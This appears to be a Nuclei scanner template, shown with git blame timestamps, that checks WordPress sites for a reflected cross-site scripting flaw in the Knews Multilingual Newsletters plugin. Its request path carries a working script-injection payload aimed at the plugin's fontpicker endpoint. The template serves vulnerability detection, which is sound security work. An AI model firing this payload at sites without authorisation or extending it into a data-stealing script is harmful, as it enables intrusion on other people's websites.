nuclei-templates/vulnerabilities/wordpress/wp-knews-xss.yaml

31 lines
747 B
YAML
Raw Normal View History

2021-07-11 06:11:03 +00:00
id: wp-knews-xss
info:
name: WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting
2021-07-11 06:11:03 +00:00
author: daffainfo
severity: medium
reference:
- http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info
2021-07-11 06:11:03 +00:00
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
2021-07-19 06:10:45 +00:00
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-11 06:11:03 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-19 06:10:45 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-11 06:11:03 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200